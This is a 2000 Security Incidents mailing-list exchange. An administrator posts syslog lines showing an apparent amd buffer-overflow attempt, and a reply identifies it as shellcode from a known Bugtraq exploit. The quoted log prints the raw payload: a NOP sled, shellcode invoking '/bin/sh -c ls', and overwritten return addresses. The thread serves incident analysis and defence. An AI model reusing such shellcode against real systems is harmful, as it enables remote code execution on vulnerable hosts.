Security Incidents mailing list archives
Re: amd exploit(ed)?
From: mike.murray () UTORONTO CA (Mike Murray)
Date: Mon, 8 May 2000 17:46:40 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Paulo, It looks like that was what this was. In fact, it looks as though it's the shellcode from the amd-exploited.c exploit code from the 8-99 posted Bugtraq vulnerability. If you search the SecurityFocus vulnerability database for keyword "amd", it'll come up as "Multpile Vendor amd Buffer Overflow Vulnerability". Mike - ----- Original Message ----- From: "Paulo Ribeiro" <prrar () NITNET COM BR> To: <INCIDENTS () SECURITYFOCUS COM> Sent: Sunday, May 07, 2000 12:13 PM Subject: amd exploit(ed)?
Hi, all. While I's checking the system, look what I've found: May 7 01:11:19 lab syslogd: Cannot glue message parts together May 7 01:11:19 lab 27>May 7 01:11:19 amd[1047]: amq requested mount of ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~Pë1^~Iv¬~M^^H~I^° ~M^^K~I^´1À~HF^G~HF ~HF«~IF¸°^K~Ió~MN¬~MV¸Í~@1Û~IØ@Í~@èÊÿÿÿ/bin/sh -c ls;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA May 7 01:11:19 lab AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA^Eõÿ¿^Eõÿ¿^Eõÿ¿^Eõÿ¿^Eõÿ¿, but code is disabled May 7 01:12:40 lab kernel: svc: unknown program 300019 (me 100021) Was it an attempt to exploit amd? Yours,
Paulo Ribeiro. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.3 iQA/AwUBORc1vrpfrcrUemrPEQKtawCgkPX1+hSXP3JsayaaK/vdpEAvfXYAn2jY u8BdOW0zrFrRKVDP8UwNhi8L =B94p -----END PGP SIGNATURE-----
Current thread:
- Re: Lots netbios scans (udp 137) Ben Laws (May 01)
- Re: Lots netbios scans (udp 137) Greg A. Woods (May 03)
- Re: Lots netbios scans (udp 137) Bryan Andersen (May 03)
- odd message showing up logs... Josh Burroughs (May 04)
- Re: odd message showing up logs... Rick Redman (May 06)
- amd exploit(ed)? Paulo Ribeiro (May 07)
- Re: amd exploit(ed)? Mike Murray (May 08)
- Re: amd exploit(ed)? Erich Meier (May 09)
- Re: amd exploit(ed)? Jim Zajkowski (May 09)
- Re: odd message showing up logs... Robert Graham (May 07)
- Port 109 Scans Eric Maiwald (May 04)
- Re: Port 109 Scans Stone (May 06)
- Re: Lots netbios scans (udp 137) Erich Meier (May 04)
- Re: Lots netbios scans (udp 137) Greg A. Woods (May 04)
- Oversized packets Paulo Ribeiro (May 04)
- Re: Oversized packets Keith Owens (May 06)
- Re: Lots netbios scans (udp 137) Greg A. Woods (May 03)